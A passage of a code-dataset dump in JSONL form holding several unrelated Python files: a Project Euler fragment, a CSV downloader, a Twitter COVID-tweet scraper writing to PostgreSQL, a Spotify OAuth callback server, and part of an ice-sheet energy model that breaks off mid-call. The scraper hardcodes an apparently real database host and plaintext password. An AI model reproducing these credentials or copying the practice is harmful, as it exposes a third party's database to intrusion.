f(n) > threshold:\r\n            return n\r\n        n += 1\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    from time import perf_counter\r\n\r\n    t0 = perf_counter()\r\n    sol = solution()\r\n    t1 = 
perf_counter()\r\n    print(f\"solution = {sol} in {t1-t0: 0.4f} seconds\")\r\n    print(\"answer =\", ANSWER)\r\n","repo_name":"lsabor/project_euler","sub_path":"000-100/70s/077_25_Prime_summations.py","file_name":"077_25_Prime_summations.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"13732948750","text":"import requests\nimport json\nimport os\nimport errno\nimport re\n\n# Import links for CSV downloads\nwith open(\"./output/all_csv_links.json\") as f:\n    data = json.load(f)\n\nfor i,csv_link in enumerate(data):\n    # Extract all tournament ids from 'tournament_id=##' part of link\n    matches = re.findall(\".*_id=([0-9]*)\", csv_link)\n    tournament_id = matches[0]\n\n    print(\"Downloading \" + str(tournament_id) + \" from \" + csv_link)\n    print(str(i+1) + \" of \" + str(len(data)))\n\n    # Create directory to file if needed\n    filename = \"./tourney_csvs/\" + str(tournament_id) + \".csv\"\n    if not os.path.exists(os.path.dirname(filename)):\n        try:\n            os.makedirs(os.path.dirname(filename))\n        except OSError as exc:\n            if exc.errno != errno.EEXIST:\n                raise\n    \n    # Write to file in binary mode, since r.content is bytes\n    r = requests.get(csv_link, allow_redirects=True)\n    with open(filename, \"wb\") as f:\n        f.write(r.content)","repo_name":"colinfong/askfred_scraper","sub_path":"download_csvs.py","file_name":"download_csvs.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"2668274035","text":"'''\n* Title: GraphicsDrawer source code\n* Author: Smith, J\n* Date: 2011\n* Code version: 2.0\n* Availability: http://www.graphicsdrawer.com\n'''\n\nimport time\nimport user\nimport tweepy\nimport psycopg2\n\nauth = tweepy.OAuthHandler(user.CONSUMER_KEY, user.CONSUMER_KEY_SECRET)\nauth.set_access_token(user.ACCESS_TOKEN, user.ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\n\n\nclass MyStreamListener(tweepy.StreamListener):\n\n    def __init__(self, time_limit=300):\n        self.start_time = time.time()\n        self.limit = time_limit\n        super(MyStreamListener, self).__init__()\n\n    def on_connect(self):\n        print(\"Connected to Twitter API.\")\n\n    def on_status(self, status):\n\n        # Tweet ID\n        tweet_id = status.id\n\n        # User ID\n        user_id = status.user.id\n        # Username\n        username = status.user.name\n\n        # Tweet\n        if status.truncated == True:\n            tweet = status.extended_tweet['full_text']\n            hashtags = status.extended_tweet['entities']['hashtags']\n        else:\n            tweet = status.text\n            hashtags = status.entities['hashtags']\n\n        # Read hashtags\n        hashtags = read_hashtags(hashtags)\n\n        # Retweet count\n        retweet_count = status.retweet_count\n        # Language\n        lang = status.lang\n\n        # If tweet is not a retweet and tweet is in English\n        if not hasattr(status, \"retweeted_status\") and lang == \"en\":\n            # Connect to database\n            dbConnect(user_id, username, tweet_id, tweet, retweet_count, hashtags)\n\n        if (time.time() - self.start_time) > self.limit:\n            print(time.time(), self.start_time, self.limit)\n            return False\n\n    def on_error(self, status_code):\n        if status_code == 420:\n            # Returning False in on_data disconnects the stream\n            return False\n\n# Extract hashtags\ndef read_hashtags(tag_list):\n    hashtags = []\n    for tag in tag_list:\n        hashtags.append(tag['text'])\n    return hashtags\n\n# commands = (# Table 1\n#             '''Create Table TwitterUser(User_Id BIGINT PRIMARY KEY, User_Name TEXT);''',\n#             # Table 2\n#             '''Create Table TwitterTweet(Tweet_Id BIGINT PRIMARY KEY,\n#                                 User_Id BIGINT,\n#                                 Tweet TEXT,\n#                                 
Retweet_Count INT,\n# CONSTRAINT fk_user\n# FOREIGN KEY(User_Id)\n# REFERENCES TwitterUser(User_Id));''',\n# # Table 3\n# '''Create Table TwitterEntity(Id SERIAL PRIMARY KEY,\n# Tweet_Id BIGINT,\n# Hashtag TEXT,\n# CONSTRAINT fk_user\n# FOREIGN KEY(Tweet_Id)\n# REFERENCES TwitterTweet(Tweet_Id));''')\n\n# Connection to database server\n# need to allow ip address on GCP first - remember to convert to CIDR format with \"to\" address\nconn = psycopg2.connect(host=\"34.86.177.25\", database=\"postgres\", user='postgres', password = 'COVID_type8eat')\n\n# Create cursor to execute SQL commands\ncur = conn.cursor()\n\n# Execute SQL commands\n# for command in commands:\n# # Create tables\n# cur.execute(command)\n\n# Close communication with server\nconn.commit()\ncur.close()\nconn.close()\n\n# Insert Tweet data into database\ndef dbConnect(user_id, user_name, tweet_id, tweet, retweet_count, hashtags):\n # need to allow ip address first - remember to convert to CIDR format with \"to\" address\n conn = psycopg2.connect(host=\"34.86.177.25\", database=\"postgres\", user= 'postgres', password = 'COVID_type8eat')\n\n cur = conn.cursor()\n\n # insert user information\n command = '''INSERT INTO TwitterUser (user_id, user_name) VALUES (%s,%s) ON CONFLICT\n (User_Id) DO NOTHING;'''\n cur.execute(command, (user_id, user_name))\n\n # insert tweet information\n command = '''INSERT INTO TwitterTweet (tweet_id, user_id, tweet, retweet_count) VALUES (%s,%s,%s,%s);'''\n cur.execute(command, (tweet_id, user_id, tweet, retweet_count))\n\n # insert entity information\n for i in range(len(hashtags)):\n hashtag = hashtags[i]\n command = '''INSERT INTO TwitterEntity (tweet_id, hashtag) VALUES (%s,%s);'''\n cur.execute(command, (tweet_id, hashtag))\n\n # Commit changes\n conn.commit()\n\n # Disconnect\n cur.close()\n conn.close()\n\nmyStreamListener = MyStreamListener()\nmyStream = tweepy.Stream(auth=api.auth, listener=myStreamListener,\n tweet_mode=\"extended\")\nmyStream.filter(track=['covid','coronavirus','pandemic','covid19','covid-19'])","repo_name":"shoang22/hackgt","sub_path":"db/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6669455287","text":"import requests\nimport base64\nimport random\nimport string\nimport urllib\nimport urllib.parse\nfrom http.server import BaseHTTPRequestHandler\nfrom dotenv import dotenv_values\n\nimport spotifyclient\n\nconfig = {\n **dotenv_values('.env'),\n **dotenv_values('.env.local'),\n}\nfrom oauthlib.oauth2 import WebApplicationClient\n\n\ndef random_name(n):\n return ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(n)])\n\n\nclass CallbackServer(BaseHTTPRequestHandler):\n g_oauth_state = None\n g_access_token = None\n g_refresh_token = None\n\n spotify_client = None\n# primary_device_id = None\n\n VUE_APP_SPOTIFY_CLIENT_ID = config['VUE_APP_SPOTIFY_CLIENT_ID']\n VUE_APP_SPOTIFY_CLIENT_SECRET = config['VUE_APP_SPOTIFY_CLIENT_SECRET']\n\n def __init__(self, *args):\n print(f'CallbackServer::init start {args}')\n BaseHTTPRequestHandler.__init__(self, *args)\n print('CallbackServer::init finish')\n\n def callback_method(self, path, query, redirect_uri):\n print(f'path={path}, query = {query}')\n\n if path == '/callback':\n params = urllib.parse.parse_qs(query)\n print('CODE')\n print(params['code'][0])\n print('STATE')\n print(f'g_oauth_state = {self.g_oauth_state}')\n print(params['state'][0])\n 
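# the state echoed back in the callback must match the value generated when the flow started (OAuth CSRF guard)\n            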
print(self.g_oauth_state)\n if CallbackServer.g_oauth_state == params['state'][0]:\n print('OK!')\n data = {\n 'code': params['code'][0],\n 'redirect_uri': redirect_uri,\n 'grant_type': 'authorization_code'\n }\n encoded = base64.b64encode(\n f'{CallbackServer.VUE_APP_SPOTIFY_CLIENT_ID}:{CallbackServer.VUE_APP_SPOTIFY_CLIENT_SECRET}'.encode(\n 'utf-8')).decode(\"ascii\")\n print(encoded)\n print(redirect_uri)\n response = requests.post(\n 'https://accounts.spotify.com/api/token',\n data=data,\n headers={\n 'Authorization': f'Basic {encoded}'\n }\n )\n print(response)\n print(response.text)\n # print(response.json())\n res_data = response.json()\n CallbackServer.spotify_client = spotifyclient.SpotifyClient(\n access_token=res_data['access_token'],\n refresh_token=res_data['refresh_token']\n )\n CallbackServer.g_access_token = res_data['access_token']\n CallbackServer.g_refresh_token = res_data['refresh_token']\n return 'oauth OK!'\n else:\n return 'oauth NG!'\n\n return ['Hello', 'World!', 'with', query]\n\n def do_GET(self):\n parsed_path = urllib.parse.urlparse(self.path)\n print(self.headers['Host'])\n print(self.path)\n print(parsed_path)\n print(parsed_path.path)\n path = parsed_path.path\n query = parsed_path.query\n\n host = self.headers['Host']\n redirect_uri = f'http://{host}/callback'\n\n if query == 'oauth':\n scope = [\n 'user-library-read',\n 'user-modify-playback-state',\n 'user-read-email',\n 'user-read-playback-state',\n 'user-read-private',\n 'user-read-recently-played'\n ]\n state = random_name(16)\n CallbackServer.g_oauth_state = state\n print(f'g_oauth_state = {CallbackServer.g_oauth_state}')\n oauth = WebApplicationClient(CallbackServer.VUE_APP_SPOTIFY_CLIENT_ID)\n url, headers, body = oauth.prepare_authorization_request('https://accounts.spotify.com/authorize',\n redirect_url=redirect_uri,\n scope=scope,\n state=state)\n\n self.send_response(302)\n self.send_header('Location', url)\n self.end_headers()\n return\n\n elif path == '/callback':\n result = self.callback_method(parsed_path.path, query, redirect_uri)\n self.send_response(302)\n self.send_header('Location', '/spotify1')\n self.end_headers()\n # self.end_headers()\n # message = result\n # self.wfile.write(message.encode('utf-8'))\n return\n\n elif path == '/spotify1':\n CallbackServer.spotify_client.get(\n '/v1/me/player/devices'\n )\n self.send_response(200)\n self.end_headers()\n message = 'devices'\n self.wfile.write(message.encode('utf-8'))\n return\n\n\n\n else:\n self.send_response(200)\n self.end_headers()\n message = query\n self.wfile.write(message.encode('utf-8'))\n return\n\n def ir1(self, name):\n print(f'ir1 {name}')\n CallbackServer.spotify_client.get_devices()\n CallbackServer.spotify_client.play_or_pause()\n\n def play(self):\n\n pass\n","repo_name":"naoki-iwami/rasprebby-pi-infrared","sub_path":"spotifyutil.py","file_name":"spotifyutil.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43700224086","text":"from __future__ import division\nfrom __future__ import print_function\nfrom builtins import range\nfrom dolfin import *\nfrom dolfin_adjoint import *\nfrom cslvr.inputoutput import get_text, print_text, print_min_max\nfrom cslvr.d3model import D3Model\nfrom cslvr.d2model import D2Model\nfrom cslvr.d1model import D1Model\nfrom cslvr.physics import Physics\nfrom cslvr.helper import VerticalBasis, VerticalFDBasis, \\\n raiseNotDefined\nfrom copy import deepcopy\nimport numpy as np\nimport 
matplotlib.pyplot as plt\nimport sys\nimport os\nimport json\n\n\n\n\n\n\nclass Energy(Physics):\n\t\"\"\"\n\tAbstract class outlines the structure of an energy conservation.\n\t\"\"\"\n\n\tdef __new__(self, model, *args, **kwargs):\n\t\t\"\"\"\n\t\tCreates and returns a new Energy object.\n\t\t\"\"\"\n\t\tinstance = Physics.__new__(self, model)\n\t\treturn instance\n\n\t# TODO: `energy_flux_mode` and `stabilization_method` are specific to the\n\t# D3Model energy solvers.\n\tdef __init__(self, model, momentum,\n\t solve_params = None,\n\t transient = False,\n\t use_lat_bc = False,\n\t energy_flux_mode = 'B_ring',\n\t stabilization_method = 'GLS'):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\ts = \"::: INITIALIZING ENERGY :::\"\n\t\tprint_text(s, cls=self)\n\t\t# save the starting values, as other algorithms might change the\n\t\t# values to suit their requirements :\n\t\tif isinstance(solve_params, dict):\n\t\t\tpass\n\t\telif solve_params == None:\n\t\t\tsolve_params = self.default_solve_params()\n\t\t\ts = \"::: using default parameters :::\"\n\t\t\tprint_text(s, cls=self)\n\t\t\ts = json.dumps(solve_params, sort_keys=True, indent=2)\n\t\t\tprint_text(s, '230')\n\t\telse:\n\t\t\ts = \">>> Energy REQUIRES A 'dict' INSTANCE OF SOLVER \" + \\\n\t\t\t \"PARAMETERS, NOT %s <<<\"\n\t\t\tprint_text(s % type(solve_params) , 'red', 1)\n\t\t\tsys.exit(1)\n\n\t\tself.momentum_s = momentum\n\t\tself.solve_params_s = deepcopy(solve_params)\n\t\tself.transient_s = transient\n\t\tself.use_lat_bc_s = use_lat_bc\n\t\tself.energy_flux_mode_s = energy_flux_mode\n\t\tself.stabilization_method_s = stabilization_method\n\n\t\tself.T_ini = self.model.T.copy(True)\n\t\tself.W_ini = self.model.W.copy(True)\n\n\t\tself.initialize(model, momentum, solve_params, transient,\n\t\t use_lat_bc, energy_flux_mode, stabilization_method)\n\n\tdef initialize(self, model, momentum, solve_params=None, transient=False,\n\t use_lat_bc=False, energy_flux_mode='B_ring',\n\t stabilization_method='GLS', reset=False):\n\t\t\"\"\"\n\t\tHere we set up the problem, and do all of the differentiation and\n\t\tmemory allocation type stuff. Note that any Energy object *must*\n\t\tcall this method. 
See the existing child Energy objects for reference.\n\t\t\"\"\"\n\t\traiseNotDefined()\n\n\tdef make_transient(self, time_step):\n\t\t\"\"\"\n\t\tset the energy system to transient form.\n\t\t\"\"\"\n\t\ts = \"::: RE-INITIALIZING ENERGY PHYSICS WITH TRANSIENT FORM :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tself.model.init_time_step(time_step)\n\n\t\tself.initialize(model = self.model,\n\t\t momentum = self.momentum_s,\n\t\t solve_params = self.solve_params_s,\n\t\t transient = True,\n\t\t use_lat_bc = self.use_lat_bc_s,\n\t\t energy_flux_mode = self.energy_flux_mode_s,\n\t\t stabilization_method = self.stabilization_method_s,\n\t\t reset = True)\n\n\tdef make_steady_state(self):\n\t\t\"\"\"\n\t\tset the energy system to steady-state form.\n\t\t\"\"\"\n\t\ts = \"::: RE-INITIALIZING ENERGY PHYSICS WITH STEADY-STATE FORM :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tself.initialize(model = self.model,\n\t\t momentum = self.momentum_s,\n\t\t solve_params = self.solve_params_s,\n\t\t transient = False,\n\t\t use_lat_bc = self.use_lat_bc_s,\n\t\t energy_flux_mode = self.energy_flux_mode_s,\n\t\t stabilization_method = self.stabilization_method_s,\n\t\t reset = True)\n\n\tdef set_basal_flux_mode(self, mode):\n\t\t\"\"\"\n\t\treset the energy system to use zero energy basal flux.\n\t\t\"\"\"\n\t\ts = \"::: RE-INITIALIZING ENERGY PHYSICS NEUMANN BASAL BC TO \" + \\\n\t\t \"\\'%s\\' :::\" % mode\n\t\tprint_text(s, cls=self)\n\n\t\tself.initialize(model = self.model,\n\t\t momentum = self.momentum_s,\n\t\t solve_params = self.solve_params_s,\n\t\t transient = self.transient_s,\n\t\t use_lat_bc = self.use_lat_bc_s,\n\t\t energy_flux_mode = mode,\n\t\t stabilization_method = self.stabilization_method_s,\n\t\t reset = True)\n\n\tdef reset(self):\n\t\t\"\"\"\n\t\treset the energy system to the original configuration.\n\t\t\"\"\"\n\t\ts = \"::: RE-INITIALIZING ENERGY PHYSICS :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tself.model.init_T(self.T_ini)\n\t\tself.model.init_W(self.W_ini)\n\n\t\tself.initialize(model = self.model,\n\t\t momentum = self.momentum_s,\n\t\t solve_params = self.solve_params_s,\n\t\t transient = self.transient_s,\n\t\t use_lat_bc = self.use_lat_bc_s,\n\t\t energy_flux_mode = self.energy_flux_mode_s,\n\t\t stabilization_method = self.stabilization_method_s,\n\t\t reset = True)\n\n\tdef color(self):\n\t\t\"\"\"\n\t\treturn the default color for this class.\n\t\t\"\"\"\n\t\treturn '213'\n\n\tdef get_ice_thermal_conductivity(self):\n\t\t\"\"\"\n\t\tReturns the thermal conductivity for ice.\n\t\t\"\"\"\n\t\treturn self.model.spy * 9.828 * exp(-0.0057*self.model.T)\n\n\tdef get_ice_heat_capacity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\treturn 146.3 + 7.253*self.model.T\n\n\tdef get_bulk_thermal_conductivity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tk_i = self.get_ice_thermal_conductivity()\n\t\tk_w = self.model.spy * self.model.k_w\n\t\tW = self.model.W\n\t\treturn (1-W)*k_i + W*k_w\n\n\tdef get_bulk_heat_capacity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tc_i = self.get_ice_heat_capacity()\n\t\tc_w = self.model.c_w\n\t\tW = self.model.W\n\t\treturn (1-W)*c_i + W*c_w\n\n\tdef get_bulk_density(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tW = self.model.W\n\t\trho_i = self.model.rho_i\n\t\trho_w = self.model.rho_w\n\t\treturn (1-W)*rho_i + W*rho_w\n\n\tdef get_enthalpy_gradient_conductivity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\t# coefficient for non-advective water flux (enthalpy-gradient) :\n\t\tk_c = conditional( gt(self.model.W, 0.0), self.model.k_0, 1 )\n\t\tk = self.get_bulk_thermal_conductivity()\n\t\treturn k_c * 
k\n\n\tdef get_enthalpy_gradient_diffusivity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tc = self.get_bulk_heat_capacity()\n\t\trho = self.get_bulk_density()\n\t\tkappa = self.get_enthalpy_gradient_conductivity()\n\t\treturn kappa / (rho*c)\n\n\tdef get_grid_peclet_number(self):\n\t\tr\"\"\"\n\t\tReturns the grid P\\'{e}clet number.\n\t\t\"\"\"\n\t\trho = self.get_bulk_density()\n\t\tc = self.get_bulk_heat_capacity()\n\t\tkappa = self.get_enthalpy_gradient_conductivity()\n\t\tu = self.momentum.get_velocity()\n\t\th = self.model.h\n\t\tut = rho*u - grad(kappa/c)\n\t\tu_norm = sqrt(dot(ut, ut) + DOLFIN_EPS)\n\t\treturn u_norm*h / (2*kappa/c)\n\n\tdef get_temperature_flux_vector(self):\n\t\t\"\"\"\n\t\tReturns the temperature flux vector.\n\t\t\"\"\"\n\t\tT = self.model.T\n\t\tk = self.get_bulk_thermal_conductivity()\n\t\treturn k * grad(T)\n\n\tdef get_temperature_melting_flux_vector(self):\n\t\t\"\"\"\n\t\tReturns the temperature-melting flux vector.\n\t\t\"\"\"\n\t\tTm = self.model.T_melt\n\t\tk = self.get_bulk_thermal_conductivity()\n\t\treturn k * grad(Tm)\n\n\tdef get_basal_melting_rate(self):\n\t\t\"\"\"\n\t\tReturns the basal melting rate.\n\t\t\"\"\"\n\t\tq_geo = self.model.q_geo # geothermal heat\n\t\tq_fric = self.model.q_fric # friction heat\n\t\tL_f = self.model.L_f # latent heat of freezing\n\t\trho_b = self.model.rhob # bulk density\n\t\tn_b = self.model.n_b # outward unit normal on B\n\t\tT = self.model.T # temperature\n\t\tk = self.get_ice_thermal_conductivity()\n\t\tq = k * grad(T) # heat flux\n\t\treturn (q_geo + q_fric - dot(q, n_b)) / (L_f * rho_b)\n\n\tdef get_internal_friction_heat(self):\n\t\t\"\"\"\n\t\tRetuns the internal friction heat; the strain heating.\n\t\t\"\"\"\n\t\t# collect the velocity vector to be of the same dimension os the model :\n\t\tu = self.momentum.get_velocity()\n\t\tepsdot = self.momentum.effective_strain_rate(u) + self.model.eps_reg\n\t\teta = self.momentum.get_viscosity(u)\n\t\treturn 4 * eta * epsdot\n\n\tdef get_external_friction_heat(self):\n\t\tr\"\"\"\n\t\tRetuns the external friction heat over the lower surface given by\n\n\t\t.. 
math::\n\n\t\t \\begin{align}\n\t\t q_{\\mathrm{fric}} = \\beta \\underline{u}_{\\Vert} \\cdot \\underline{u}_{\\Vert}\n\t\t \\end{align}\n\n\t\twith tangential component of velocity\n\t\t:math:`\\underline{u}_{\\Vert} = \\underline{u} - (\\underline{u} \\cdot \\hat{\\underline{n}} ) \\hat{\\underline{n}}`.\n\t\t\"\"\"\n\t\tu = self.momentum.get_velocity() # velocity\n\t\tB_ring = self.model.B_ring # lower suface-mass balance\n\t\tbeta = self.model.beta # friction coefficient\n\t\tn_b = self.model.n_b # outward unit normal on B\n\t\tu_t = u - dot(u,n_b) * n_b # tangential component of u\n\t\treturn beta * dot(u_t, u_t)\n\n\tdef default_solve_params(self):\n\t\t\"\"\"\n\t\tReturns a set of default solver parameters that yield good performance\n\t\t\"\"\"\n\t\tparams = {'solver' : 'mumps',\n\t\t 'use_surface_climate' : False}\n\t\treturn params\n\n\tdef solve_surface_climate(self):\n\t\t\"\"\"\n\t\tCalculates PDD, surface temperature given current model geometry and\n\t\tsaves to model.T_surface.\n\t\t\"\"\"\n\t\ts = \"::: solving surface climate :::\"\n\t\tprint_text(s, cls=self)\n\t\tmodel = self.model\n\n\t\tT_w = model.T_w(0)\n\t\tS = model.S.vector().get_local()\n\t\tlat = model.lat.vector().get_local()\n\t\tlon = model.lon.vector().get_local()\n\n\t\t# greenland :\n\t\tTn = 41.83 - 6.309e-3*S - 0.7189*lat - 0.0672*lon + T_w\n\n\t\t## antarctica :\n\t\t#Tn = 34.46 - 0.00914*S - 0.27974*lat\n\n\t\t# Apply the lapse rate to the surface boundary condition\n\t\tmodel.init_T_surface(Tn)\n\n\tdef adjust_S_ring(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\ts = \"::: solving surface accumulation/ablation :::\"\n\t\tprint_text(s, cls=self)\n\t\tmodel = self.model\n\n\t\tT_w = model.T_w(0)\n\t\tT = model.T_surface.vector().get_local()\n\n\t\tS_ring = 2.5 * 2**((T-T_w)/10)\n\n\t\tif model.N_OMEGA_FLT > 0:\n\t\t\tshf_dofs = np.where(model.mask.vector().get_local() == 0.0)[0]\n\t\t\tS_ring[model.shf_dofs] = -100\n\n\t\tmodel.init_S_ring(S_ring)\n\n\tdef form_cost_ftn(self, kind='abs'):\n\t\t\"\"\"\n\t\tForms and returns a cost functional for use with adjoint.\n\t\tSaves to self.J.\n\t\t\"\"\"\n\t\ts = \"::: forming water-optimization cost functional :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\t\ttheta = self.get_unknown()\n\t\tthetam = model.theta\n\t\tdGamma_bg = model.dGamma_bg()\n\t\ttheta_c = model.theta_melt + model.Wc*model.L_f\n\n\t\tif kind == 'TV':\n\t\t\tself.J = sqrt((theta - theta_c)**2 + 1e-15) * dGamma_bg\n\t\t\tself.Jp = sqrt((thetam - theta_c)**2 + 1e-15) * dGamma_bg\n\t\t\ts = \" - using TV cost functional :::\"\n\t\telif kind == 'L2':\n\t\t\tself.J = 0.5 * (theta - theta_c)**2 * dGamma_bg\n\t\t\tself.Jp = 0.5 * (thetam - theta_c)**2 * dGamma_bg\n\t\t\ts = \" - using L2 cost functional :::\"\n\t\telif kind == 'abs':\n\t\t\tself.J = abs(theta - theta_c) * dGamma_bg\n\t\t\tself.Jp = abs(thetam - theta_c) * dGamma_bg\n\t\t\ts = \" - using absolute value objective functional :::\"\n\t\telse:\n\t\t\ts = \">>> ADJOINT OBJECTIVE FUNCTIONAL MAY BE 'TV', 'L2' \" + \\\n\t\t\t \"or 'abs', NOT '%s' <<<\" % kind\n\t\t\tprint_text(s, 'red', 1)\n\t\t\tsys.exit(1)\n\t\tprint_text(s, cls=self)\n\n\tdef calc_misfit(self):\n\t\t\"\"\"\n\t\tCalculates the misfit,\n\t\t\"\"\"\n\t\ts = \"::: calculating misfit L-infty norm ||theta - theta_c|| :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\t# set up functions for surface (s) and current objective (o) :\n\t\ttheta_s = Function(model.Q)\n\t\ttheta_o = Function(model.Q)\n\n\t\t# calculate L_inf norm :\n\t\ttheta_v = 
model.theta.vector().get_local()\n\t\ttheta_m_v = model.theta_melt.vector().get_local()\n\t\tWc_v = model.Wc.vector().get_local()\n\t\ttheta_c_v = theta_m_v + Wc_v * model.L_f(0)\n\t\ttheta_o.vector().set_local(np.abs(theta_v - theta_c_v))\n\t\ttheta_o.vector().apply('insert')\n\n\t\t# apply difference over only grounded surface :\n\t\tbc_theta = DirichletBC(model.Q, theta_o, model.ff, model.GAMMA_B_GND)\n\t\tbc_theta.apply(theta_s.vector())\n\n\t\t# calculate L_inf vector norm :\n\t\tD = MPI.max(mpi_comm_world(), theta_s.vector().max())\n\n\t\ts = \"||theta - theta_c|| : %.3E\" % D\n\t\tprint_text(s, '208', 1)\n\t\treturn D\n\n\tdef calc_functionals(self):\n\t\t\"\"\"\n\t\tUsed to facilitate printing the objective function in adjoint solves.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tR = assemble(self.Rp, annotate=False)\n\t\texcept AttributeError:\n\t\t\tR = 0.0\n\t\tJ = assemble(self.Jp, annotate=False)\n\t\tprint_min_max(R, 'R')\n\t\tprint_min_max(J, 'J')\n\t\treturn (R, J)\n\n\tdef calc_obj(self):\n\t\t\"\"\"\n\t\tUsed to facilitate printing the objective function in adjoint solves.\n\t\t\"\"\"\n\t\tJ = assemble(self.Jp, annotate=False)\n\t\tprint_min_max(J, 'J')\n\t\treturn J\n\n\tdef partition_energy(self, annotate=False):\n\t\t\"\"\"\n\t\tsolve for the water content model.W and temperature model.T.\n\t\t\"\"\"\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\t# temperature solved with quadradic formula, using expression for c :\n\t\ts = \"::: calculating temperature :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\t\tT_w = model.T_w(0)\n\n\t\t# temperature is a quadradic function of energy :\n\t\ttheta_v = model.theta.vector().get_local()\n\t\tT_n_v = (-146.3 + np.sqrt(146.3**2 + 2*7.253*theta_v)) / 7.253\n\t\tT_v = T_n_v.copy()\n\t\tTp_v = T_n_v.copy()\n\n\t\t# create pressure-adjusted temperature for rate-factor :\n\t\tTp_v[Tp_v > T_w] = T_w\n\t\tmodel.init_Tp(Tp_v)\n\n\t\t# correct for the pressure-melting point :\n\t\tT_melt_v = model.T_melt.vector().get_local()\n\t\ttheta_melt_v = model.theta_melt.vector().get_local()\n\t\twarm = theta_v >= theta_melt_v\n\t\tcold = theta_v < theta_melt_v\n\t\tT_v[warm] = T_melt_v[warm]\n\t\tmodel.init_T(T_v)\n\n\t\t# water content solved diagnostically :\n\t\ts = \"::: calculating water content :::\"\n\t\tprint_text(s, cls=self)\n\t\tW_v = (theta_v - theta_melt_v) / model.L_f(0)\n\n\t\t# update water content :\n\t\tW_v[W_v < 0.0] = 0.0 # no water where frozen, please.\n\t\tW_v[W_v > 1.0] = 1.0 # no hot water, please.\n\t\tmodel.assign_variable(model.W0, model.W)\n\t\tmodel.init_W(W_v)\n\n\tdef optimize_water_flux(self, max_iter, bounds=(-1e8, 0), method='ipopt',\n\t adj_save_vars=None, adj_callback=None):\n\t\t\"\"\"\n\t\tdetermine the correct basal-mass balance saved (currently) to\n\t\t``model.B_ring``.\n\t\t\"\"\"\n\t\ts = '::: optimizing for water-flux in %i maximum iterations :::'\n\t\tprint_text(s % max_iter, cls=self)\n\n\t\tmodel = self.model\n\n\t\t# reset entire dolfin-adjoint state :\n\t\tadj_reset()\n\n\t\t# starting time :\n\t\tt0 = time()\n\n\t\t# need this for the derivative callback :\n\t\tglobal counter\n\t\tcounter = 0\n\n\t\t# functional lists to be populated :\n\t\tglobal Rs, Js, Ds\n\t\tRs = []\n\t\tJs = []\n\t\tDs = []\n\n\t\t# now solve the control optimization problem :\n\t\ts = \"::: starting adjoint-control optimization with method '%s' :::\"\n\t\tprint_text(s % method, cls=self)\n\n\t\tdef eval_cb(I, B_ring):\n\t\t\ts = '::: adjoint objective eval post callback function :::'\n\t\t\tprint_text(s, 
cls=self)\n\t\t\tprint_min_max(I, 'I')\n\t\t\tprint_min_max(B_ring, 'B_ring')\n\n\t\t# objective gradient callback function :\n\t\tdef deriv_cb(I, dI, B_ring):\n\t\t\tglobal counter, Rs, Js\n\t\t\tif method == 'ipopt':\n\t\t\t\ts0 = '>>> '\n\t\t\t\ts1 = 'iteration %i (max %i) complete'\n\t\t\t\ts2 = ' <<<'\n\t\t\t\ttext0 = get_text(s0, 'red', 1)\n\t\t\t\ttext1 = get_text(s1 % (counter, max_iter), 'red')\n\t\t\t\ttext2 = get_text(s2, 'red', 1)\n\t\t\t\tif MPI.rank(mpi_comm_world())==0:\n\t\t\t\t\tprint(text0 + text1 + text2)\n\t\t\t\tcounter += 1\n\t\t\ts = '::: adjoint obj. gradient post callback function :::'\n\t\t\tprint_text(s, cls=self)\n\t\t\tprint_min_max(dI, 'dI/B_ring')\n\n\t\t\t# update the DA current velocity to the model for evaluation\n\t\t\t# purposes only; the model.assign_variable function is\n\t\t\t# annotated for purposes of linking physics models to the adjoint\n\t\t\t# process :\n\t\t\ttheta_opt = DolfinAdjointVariable(model.theta).tape_value()\n\t\t\tmodel.init_theta(theta_opt)\n\n\t\t\t# print functional values :\n\t\t\tmodel.B_ring.assign(B_ring, annotate=False)\n\t\t\tftnls = self.calc_functionals()\n\t\t\tD = self.calc_misfit()\n\n\t\t\t# functional lists to be populated :\n\t\t\tRs.append(ftnls[0])\n\t\t\tJs.append(ftnls[1])\n\t\t\tDs.append(D)\n\n\t\t\t# call that callback, if you want :\n\t\t\tif adj_callback is not None:\n\t\t\t\tadj_callback(I, dI, B_ring)\n\n\t\t# solve the momentum equations with annotation enabled :\n\t\ts = '::: solving forward problem for dolfin-adjoint annotatation :::'\n\t\tprint_text(s, cls=self)\n\t\tself.solve(annotate=True)\n\n\t\t# get the cost, regularization, and objective functionals :\n\t\tI = self.J\n\t\ttry:\n\t\t\tI += self.R\n\t\texcept AttributeError:\n\t\t\tprint_text(' - not using regularization -', cls=self)\n\n\t\t# define the control variable :\n\t\tm = Control(model.B_ring, value=model.B_ring)\n\n\t\t# state the minimization problem :\n\t\tF = ReducedFunctional(Functional(I), m, eval_cb_post=eval_cb,\n\t\t derivative_cb_post=deriv_cb)\n\n\t\t# optimize with scipy's fmin_l_bfgs_b :\n\t\tif method == 'l_bfgs_b':\n\t\t\tout = minimize(F, 